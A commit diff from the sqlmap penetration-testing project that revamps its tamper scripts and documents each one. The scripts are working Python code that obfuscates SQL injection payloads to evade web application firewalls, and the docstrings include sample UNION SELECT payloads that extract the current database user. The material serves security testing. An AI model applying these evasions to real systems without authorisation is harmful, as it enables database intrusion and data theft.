Revamp of tamper scripts, now supporting dependencies() function as well. Improved a lot the docstring and retested all. Added a new one from Ahmad too.

2024-11-22 09:36:35 +03:00 · 2011-07-06 21:04:45 +00:00 · 2011-07-06 21:04:45 +00:00 · 23b4efdcaf
commit 23b4efdcaf
parent 0d28c1e9e7
18 changed files with 399 additions and 45 deletions
--- a/doc/THANKS
+++ b/doc/THANKS
@ -26,6 +26,10 @@ Otavio Augusto <otavioarj@gmail.com>
 Simon Baker <simonb@sec-1.com>
    for reporting some bugs
 Ryan Barnett <RBarnett@trustwave.com>
    for organizing the ModSecurity SQL injection challenge,
    http://modsecurity.org/demo/challenge.html
 Emiliano Bazaes <emiliano@7espejos.com>
    for reporting a minor bug
@ -295,6 +299,9 @@ David McNab <david@conscious.co.nz>
 Spencer J. McIntyre <smcintyre@securestate.com>
    for reporting a minor bug
 Ahmad Maulana <matdhule@gmail.com>
    for providing one tamper scripts, halfversionedmorekeywords.py
 Enrico Milanese <enricomilanese@gmail.com>
    for reporting a bugs when using (-a) a single line User-Agent file
    for providing me with some ideas for the PHP backdoor
@ -327,6 +334,9 @@ Simone Onofri <simone.onofri@gmail.com>
    for patching the PHP web backdoor to make it work properly also on
    Windows
 Michele Orru <michele.orru@antisnatchor.com>
    for reporting a minor bug
 Shaohua Pan <pan@knownsec.com>
    for reporting several bugs
    for suggesting a few features
@ -545,7 +555,7 @@ pacman730 <pacman730@users.sourceforge.net>
    for reporting a bug
 Phat R. <phatthanaphol@gmail.com>
-    for reporting a minor bug
+    for reporting a few bugs
 Phil P <@superevr>
    for suggesting a minor enhancement
--- a/lib/core/option.py
+++ b/lib/core/option.py
@ -841,6 +841,8 @@ def __setTamperingFunctions():
                    last_priority = priority
                    break
                elif name == "dependencies":
                    function()
            if not found:
                raise sqlmapGenericException, "missing function 'tamper(value)' in tamper script '%s'" % tfile
@ -981,7 +983,8 @@ def __setPrefixSuffix():
        else:
            boundary.ptype = 1
-        # user who knows for --prefix/--suffix doesn't want other combinations
+        # user who provides --prefix/--suffix does not want other boundaries
        # to be tested for
        conf.boundaries = [ boundary ]
 def __setHTTPAuthentication():
--- a/tamper/apostrophemask.py
+++ b/tamper/apostrophemask.py
@ -7,18 +7,26 @@ Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import string
 from lib.core.enums import PRIORITY
 from lib.core.exception import sqlmapUnsupportedFeatureException
 __priority__ = PRIORITY.LOWEST
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces apostrophe character with it's UTF8 fullwidth counterpart
+    Replaces apostrophe character with its UTF-8 full width counterpart
-    Example: "AND '1'='1'" becomes "AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87"
+
-    Reference: http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
+    Example:
        * Input: AND '1'='1'
        * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
    References:
        * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
        * http://lukasz.pilorz.net/testy/unicode_conversion/
        * http://sla.ckers.org/forum/read.php?13,11562,11850
        * http://lukasz.pilorz.net/testy/full_width_utf/index.phps
    """
    retVal = payload
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@ -7,16 +7,29 @@ Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import string
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.LOWEST
 def dependencies():
    pass
 def tamper(payload):
    """
-    Appends encoded null byte character at the end of payload
+    Appends encoded NULL byte character at the end of payload
-    Example: "AND 1=1" becomes "AND 1=1%00"
+
    Example:
        * Input: AND 1=1
        * Output: AND 1=1%00
    Requirement:
        * Microsoft Access
    Notes:
        * Useful to bypass weak web application firewalls when the back-end
          database management system is Microsoft Access - further uses are
          also possible
    Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
    """
--- a/tamper/between.py
+++ b/tamper/between.py
@ -11,10 +11,28 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces '>' with 'NOT BETWEEN 0 AND #'
+    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
-    Example: 'A > B' becomes 'A NOT BETWEEN 0 AND B'
+
    Example:
        * Input: 'A > B'
        * Output: 'A NOT BETWEEN 0 AND B'
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The BETWEEN clause is SQL standard. Hence, this tamper script
          should work against all (?) databases
    """
    retVal = payload
--- a/tamper/charencode.py
+++ b/tamper/charencode.py
@ -14,10 +14,29 @@ from lib.core.exception import sqlmapUnsupportedFeatureException
 __priority__ = PRIORITY.LOWEST
 def dependencies():
    pass
 def tamper(payload):
    """
-    Urlencodes all characters in a given payload (not processing already encoded)
+    Url-encodes all characters in a given payload (not processing already
-    Example: 'SELECT FIELD FROM%20TABLE' becomes '%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45'
+    encoded)
    Example:
        * Input: SELECT FIELD FROM%20TABLE
        * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass very weak web application firewalls that do not
          url-decode the request before processing it through their ruleset
        * The web server will anyway pass the url-decoded version behind,
          hence it should work against any DBMS
    """
    retVal = payload
--- a/tamper/charunicodeencode.py
+++ b/tamper/charunicodeencode.py
@ -10,14 +10,23 @@ See the file 'doc/COPYING' for copying permission
 import string
 from lib.core.enums import PRIORITY
 from lib.core.exception import sqlmapUnsupportedFeatureException
 __priority__ = PRIORITY.LOWEST
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces payload with unicode-urlencode of non-encoded chars in payload (not processing already encoded)
+    Unicode-url-encodes non-encoded characters in a given payload (not
-    Example: 'SELECT FIELD%20FROM TABLE' becomes '%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
+    processing already encoded)
    Example:
        * Input: SELECT FIELD%20FROM TABLE
        * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
    Notes:
        * Does this ever work?
    """
    retVal = payload
--- a/tamper/equaltolike.py
+++ b/tamper/equaltolike.py
@ -7,21 +7,41 @@ Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import re
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 def dependencies():
    singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__)[:-3], DBMS.PGSQL))
 def tamper(payload):
    """
-    Replaces all occurances of operator = with operator LIKE
+    Replaces all occurances of operator equal ('=') with operator 'LIKE'
-    Example: 'SELECT * FROM users WHERE id=1' becomes 'SELECT * FROM users WHERE id LIKE 1'
+
    Example:
        * Input: SELECT * FROM users WHERE id=1
        * Output: SELECT * FROM users WHERE id LIKE 1
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The LIKE operator is SQL standard. Hence, this tamper script
          should work against all (?) databases
    """
    def process(match):
        word = match.group()
        word = "%sLIKE%s" % (" " if word[0]!=" " else "", " " if word[-1]!=" " else "")
        return word
    retVal = payload
--- a/tamper/halfversionedmorekeywords.py
+++ b/tamper/halfversionedmorekeywords.py
@ -0,0 +1,58 @@
 #!/usr/bin/env python
 """
 $Id$
 Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import re
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import kb
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
 __priority__ = PRIORITY.HIGHER
 def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.0" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
 def tamper(payload):
    """
    Adds versioned MySQL comment before each keyword
    Example:
        * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
        * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
    Requirement:
        * MySQL < 5.0
    Tested against:
        * MySQL 4.0.18
    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html
    """
    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!0%s" % word)
        else:
            return match.group()
    retVal = payload
    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!0", "/*!0")
    return retVal
--- a/tamper/ifnull2ifisnull.py
+++ b/tamper/ifnull2ifisnull.py
@ -11,14 +11,31 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
+    Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
-    Example: 'IFNULL(1, 2)' becomes 'IF(ISNULL(1), 2, 1)'
+
    Example:
        * Input: IFNULL(1, 2)
        * Output: IF(ISNULL(1), 2, 1)
    Requirement:
        * MySQL
        * SQLite (possibly)
        * SAP MaxDB (possibly)
    Tested against:
        * MySQL 5.0 and 5.5
    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that filter the IFNULL() function
    """
    if payload and payload.find("IFNULL") > -1:
        while payload.find("IFNULL(") > -1:
            index = payload.find("IFNULL(")
            deepness = 1
--- a/tamper/multiplespaces.py
+++ b/tamper/multiplespaces.py
@ -10,16 +10,26 @@ See the file 'doc/COPYING' for copying permission
 import random
 import re
 from lib.core.common import randomRange
 from lib.core.data import kb
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL
 def dependencies():
    pass
 def tamper(payload):
    """
-    Adding multiple spaces around SQL keywords
+    Adds multiple spaces around SQL keywords
-    Example: 'UNION SELECT' migth become '  UNION   SELECT  '
+
    Example:
        * Input: UNION SELECT
        * Output:  UNION   SELECT  
    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
    Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
    """
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@ -15,10 +15,27 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL
 def dependencies():
    pass
 def tamper(payload):
    """
    Replaces each keyword character with random case value
-    Example: 'INSERT' might become 'InsERt'
+
    Example:
        * Input: INSERT
        * Output: InsERt
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases
    """
    retVal = payload
--- a/tamper/space2comment.py
+++ b/tamper/space2comment.py
@ -11,10 +11,25 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.LOW
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces ' ' with '/**/'
+    Replaces space character (' ') with comments '/**/'
-    Example: 'SELECT id FROM users' becomes 'SELECT/**/id/**/FROM/**/users'
+
    Example:
        * Input: SELECT id FROM users
        * Output: SELECT/**/id/**/FROM/**/users
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass weak and bespoke web application firewalls
    """
    retVal = payload
--- a/tamper/space2extrarandomblank.py
+++ b/tamper/space2extrarandomblank.py
@ -0,0 +1,71 @@
 #!/usr/bin/env python
 """
 $Id$
 Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import random
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.LOW
 def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
 def tamper(payload):
    """
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters
    Example:
        * Input: SELECT id FROM users
        * Output: SELECT%0Bid%0BFROM%A0users
    Tested against:
        * MySQL 5.1
    Notes:
        * Useful to bypass several web application firewalls
    """
    # ASCII table:
    #   \t      09      horizontal TAB
    #   \n      0A      new line
    #   -       0C      new page
    #   \r      0D      carriage return
    #   -       0B      vertical TAB        (MySQL only)
    #   -       A0      -                   (MySQL only)
    blanks = ['%09', '%0A', '%0C', '%0D', '%0B', '%A0']
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)
                    continue
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i]==" " and not doublequote and not quote:
                retVal += random.choice(blanks)
                continue
            retVal += payload[i]
    return retVal
--- a/tamper/space2plus.py
+++ b/tamper/space2plus.py
@ -11,10 +11,21 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.LOW
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces ' ' with '+'
+    Replaces space character (' ') with plus ('+')
-    Example: 'SELECT id FROM users' becomes 'SELECT+id+FROM+users'
+
    Example:
        * Input: SELECT id FROM users
        * Output: SELECT+id+FROM+users
    Notes:
        * Is this any useful? The plus get's url-encoded by sqlmap engine
          invalidating the query afterwards
        * This tamper script works against all databases
    """
    retVal = payload
--- a/tamper/space2randomblank.py
+++ b/tamper/space2randomblank.py
@ -13,13 +13,34 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.LOW
 def dependencies():
    pass
 def tamper(payload):
    """
-    Replaces ' ' with a random blank char from a set ('\r', '\n', '\t')
+    Replaces space character (' ') with a random blank character from a
-    Example: 'SELECT id FROM users' becomes 'SELECT\rid\tFROM\nusers'
+    valid set of alternate characters
    Example:
        * Input: SELECT id FROM users
        * Output: SELECT\rid\tFROM\nusers
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
    Notes:
        * Useful to bypass several web application firewalls
    """
-    blanks = ['\r', '\n', '\t']
+    # ASCII table:
    #   \t      09      horizontal TAB
    #   \n      0A      new line
    #   -       0C      new page
    #   \r      0D      carriage return
    blanks = ['%09', '%0A', '%0C', '%0D']
    retVal = payload
    if payload:
@ -46,4 +67,3 @@ def tamper(payload):
            retVal += payload[i]
    return retVal
--- a/tamper/versionedkeywords.py
+++ b/tamper/versionedkeywords.py
@ -7,18 +7,38 @@ Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import re
-from lib.core.common import randomRange
+from lib.core.common import singleTimeWarnMessage
 from lib.core.data import kb
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHER
 def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
 def tamper(payload):
    """
    Encloses each non-function keyword with versioned MySQL comment
-    Example: 'INSERT' will become '/*!INSERT*/'
+
    Example:
        * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
        * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
    Requirement:
        * MySQL
    Tested against:
        * MySQL 4.0.18
        * MySQL 5.1.56
        * MySQL 5.5.11
    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
    """
    def process(match):
--- a/tamper/versionedmorekeywords.py
+++ b/tamper/versionedmorekeywords.py
@ -10,18 +10,35 @@ See the file 'doc/COPYING' for copying permission
 import os
 import re
 from lib.core.common import randomRange
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import kb
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
 __priority__ = PRIORITY.HIGHER
 def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
 def tamper(payload):
    """
-    Encloses each keyword with versioned MySQL comment (MySQL >= 5.1.13)
+    Encloses each keyword with versioned MySQL comment
-    Example: 'INSERT' will become '/*!INSERT*/'
+
    Example:
        * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
        * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
    Requirement:
        * MySQL >= 5.1.13
    Tested against:
        * MySQL 5.1.56
        * MySQL 5.5.11
    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
    """
    def process(match):
@ -31,8 +48,6 @@ def tamper(payload):
        else:
            return match.group()
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against MySQL >= 5.1.13" % os.path.basename(__file__))
    retVal = payload
    if payload: